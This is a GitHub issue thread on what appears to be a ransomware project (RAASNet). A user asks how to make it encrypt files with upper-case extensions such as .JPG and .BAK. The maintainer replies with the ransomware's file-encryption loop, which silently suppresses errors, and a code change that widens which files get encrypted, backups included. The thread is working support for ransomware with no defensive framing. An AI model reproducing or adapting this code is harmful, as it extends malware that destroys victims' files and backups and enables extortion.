### ISSUE TITLE
file extension CAPITAL LETTER

### ISSUE THREAD

**Issue by jokerwins** [leonv024/RAASNet#45]
hello how im can change the file extension to .JPG
or .BAK

its work now only by small letters

# Encrypt file that endswith
ext = ['.BAK',
]

what im need?

**Comment by leonv024** [comment]
That's right. it change the extension to a lower-case format later on in the code:

```
for i in ext:
    if name.endswith(i.lower()): # <--- Remove .lower() from this line.                   
        try:
            encrypt_file(os.path.join(path, name), key)
            c +=1                       
        except Exception as e:                        
            pass
```

replace `name.endswith(i.lower())` with `name.endswith(i)`
